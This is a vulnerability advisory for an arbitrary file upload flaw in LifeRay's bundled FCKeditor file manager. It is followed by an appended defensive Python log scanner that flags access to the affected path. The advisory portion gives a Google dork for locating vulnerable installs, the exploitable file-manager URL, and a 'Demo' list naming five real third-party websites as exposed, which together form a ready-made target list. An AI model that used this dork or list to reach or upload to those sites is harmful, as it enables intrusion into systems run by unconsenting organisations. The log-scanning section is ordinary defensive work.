LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability

2020.04.10
Author: h4shur (FR)
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-434

[+] Title: LifeRay CMS (Fckeditor) Arbitrary File Upload Vulnerability
[+] Date: 2020/04/10
[+] Author: h4shur
[+] Team: Persian Security Group
[+] Vendor Homepage: www.liferay.com
[+] Software Link: www.liferay.com
[+] Tested on: Windows 10
[+] Category: Web Application Bugs
[+] Dork: inurl:/web/guest/ inurl:/html/js/editor/fckeditor/

### Notes:

LifeRay installations that expose the bundled FCKeditor file manager allow an attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment (CWE-434). Files uploaded this way represent a significant risk to the application.

### POC:

[+] http://site/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html

### Demo:

[+] http://asd-ssg.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.ap239.org/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://franchise.hrblock.com.au/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://www.eof.gr/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html
[+] http://securefile.co/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html

### Special Thanks:

* Po0ri4 & b4ckdo0r

### Contact Me:

* Telegram: @h4shur
* Email: h4shursec@gmail.com
* Instagram: @netedit0r
* Twitter: @h4shur
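For defenders, the practical question this advisory raises is whether the legacy FCKeditor file manager path is reachable on their own LifeRay instance and whether anyone has been hitting it. The following is an added example (not part of the advisory and not LifeRay or FCKeditor code) that scans web-server access logs in the standard combined format and flags requests under the `/html/js/editor/fckeditor/editor/filemanager/` prefix taken from the advisory's PoC URL, separating plain browser.html reads from POSTs that would indicate a write attempt and recording whether the server actually served the request. The log lines embedded below are constructed samples, the POST target under the file-manager prefix is a made-up placeholder, and the combined log format is assumed.

```python
import re
from collections import Counter

# Prefix of the FCKeditor file manager shipped inside the affected
# LifeRay deployment, taken from the advisory's PoC URL.
FCKEDITOR_FILEMANAGER = "/html/js/editor/fckeditor/editor/filemanager/"

# Apache/nginx "combined" access log format (assumption: this is the format in use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines; the POST path under the file-manager prefix
# is a placeholder, not a real FCKeditor endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2020:10:00:01 +0000] "GET /web/guest/home HTTP/1.1" 200 5120
203.0.113.5 - - [10/Apr/2020:10:00:07 +0000] "GET /html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 200 2210
203.0.113.5 - - [10/Apr/2020:10:00:15 +0000] "POST /html/js/editor/fckeditor/editor/filemanager/PLACEHOLDER_UPLOAD_HANDLER?Type=File HTTP/1.1" 200 310
198.51.100.9 - - [10/Apr/2020:10:05:00 +0000] "GET /html/js/editor/fckeditor/fckeditor.js HTTP/1.1" 200 1500
198.51.100.9 - - [10/Apr/2020:10:05:02 +0000] "GET /html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html HTTP/1.1" 403 150
"""


def parse_line(line):
    """Parse one combined-format access log line into a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Label a parsed entry: None if it is outside the file-manager prefix,
    otherwise a string describing what kind of access it was."""
    path = entry["path"].split("?", 1)[0]  # ignore the query string when matching
    if not path.startswith(FCKEDITOR_FILEMANAGER):
        return None
    if entry["method"] == "POST":
        return "filemanager_write_attempt"
    if path.endswith("/browser.html"):
        return "filemanager_browser_access"
    return "filemanager_access"


def scan(log_text):
    """Return a list of findings for every request that touched the file manager.
    'served' is True when the server answered with a 2xx, i.e. the path is exposed."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        label = classify(entry)
        if label is None:
            continue
        findings.append({
            "ip": entry["ip"],
            "ts": entry["ts"],
            "label": label,
            "path": entry["path"],
            "status": entry["status"],
            "served": entry["status"].startswith("2"),
        })
    return findings


def summarize(findings):
    """Count findings per (source IP, label) so repeat offenders stand out."""
    return Counter((f["ip"], f["label"]) for f in findings)


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        state = "SERVED" if f["served"] else "blocked"
        print(f'{f["ts"]} {f["ip"]:<15} {f["label"]:<28} {state:<8} {f["path"]}')
    print(summarize(results))
```

Any `filemanager_browser_access` finding with `served` set is evidence that the file manager is reachable without authentication and should be removed or put behind access control; a `filemanager_write_attempt` that was served warrants a look at the webroot for newly written files. The same prefix can be turned into a web-server deny rule so the path returns 403 regardless of what the legacy editor code would do.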



Copyright 2024, cxsecurity.com
